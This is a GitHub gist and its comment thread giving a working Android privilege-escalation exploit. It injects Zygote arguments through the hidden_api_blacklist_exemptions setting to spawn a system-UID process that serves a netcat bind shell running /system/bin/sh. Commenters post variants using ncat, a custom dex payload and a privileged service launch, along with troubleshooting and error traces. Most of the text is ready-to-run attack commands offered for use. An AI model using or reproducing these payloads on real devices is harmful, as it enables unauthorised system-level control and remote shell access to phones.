-
-
Save ybtag/db3f3595139556c773fb94b7cbe668b5 to your computer and use it in GitHub Desktop.
| am force-stop com.android.settings | |
| settings put global hidden_api_blacklist_exemptions "LClass1;->method1( | |
| 15 | |
| --runtime-args | |
| --setuid=1000 | |
| --setgid=1000 | |
| --runtime-flags=2049 | |
| --mount-external-full | |
| --target-sdk-version=29 | |
| --setgroups=3003 | |
| --nice-name=runnetcat | |
| --seinfo=platform:su:targetSdkVersion=29:complete | |
| --invoke-with | |
| toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l; | |
| --instruction-set=arm | |
| --app-data-dir=/data/ | |
| --package-name=com.android.settings | |
| android.app.ActivityThread | |
| " | |
| am start -a android.settings.SETTINGS | |
| nc localhost 1234 |
interesting. I didn't think it would be able to execute from the tmp folder. By the way the su part doesn't matter that was just left from my testing.
Yeah, unfortunately my toybox built with no nc. Do you know what I need to look at the log in case of failure/success? And I suppose you executing those commands in shell simultaneously via sh script or separately one-by-one?
I didn't bother with a script since I have android 10. You would see zygote errors in logcat and/or selinux denials in dmesg
Tried to reproduce on my honor device - no luck... Had to use ncat instead like that:
am force-stop com.android.settings settings put global hidden_api_blacklist_exemptions "LClass1;->method1( 15 --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=2049 --mount-external-full --target-sdk-version=29 --setgroups=3003 --nice-name=runnetcat --seinfo=platform:su:targetSdkVersion=29:complete --invoke-with /data/local/tmp/ncat -l -e /system/bin/sh 127.0.0.1 1234; --instruction-set=arm --app-data-dir=/data/ --package-name=com.android.settings android.app.ActivityThread " am start -a android.settings.SETTINGS nc localhost 1234
Which ncat are you using?
@ybtag thanks for sharing this it works but I was trying to run a service using this exploit which would have some method to perform privileged functions and then return the response. This service could be then called by a custom non-privileged application during runtime achieve privilege function calls and show the result on the UI. Were able to achieve this or anything similar?
i've managed also to make this exploit work on an Android 11 and 10
is there any possibility to use this exploit to temporarily root a device? and also what directories are safe to place bin/executables since /data/local/tmp is inaccessible
@Bonveio were u able to achieve something like this https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933?
@Bonveio were u able to achieve something like this https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933?
from what i understand to the PoC, its impossible to initialize the exploit without the UID 2000 (shell user) which you can only achieve externally using adb (if the device is not rooted, if it is rooted i think you can run adbd on a superuser shell). but the running netcat shell server with UID 1000 privilege listening on 0.0.0.0 is accessible by any android apps on the device like Termux. Just be careful to remove the hidden_api_blacklist_exemptions before rebooting/restarting the device or else the device will occur in bootloop
@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.
@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.
This is way beyond my knowledge im sorry i might not be able to help you with that matter, but im happy if i can test the custom application you're trying to build so i can report or suggest something that might be helpful on your development
For example if I do something like this
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
am start-foreground-service -n com.user.helloworld/.PrivilegedService;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
Then Settings app crashes on opening and this command am start-foreground-service -n com.user.helloworld/.PrivilegedService; present in --invoke-with doesnt get invoked properly
Following this - https://blog.flanker017.me/cve-2024-31317/
I tried to do something like this
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"
But it is throwing Already Cached excpetion
java.lang.IllegalStateException: Already cached. at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148) at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374) at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144) at com.android.internal.os.WrapperInit.main(WrapperInit.java:83) at java.lang.reflect.Method.invoke(Native Method) at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492) at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)
Tried to reproduce on my honor device - no luck... Had to use ncat instead like that: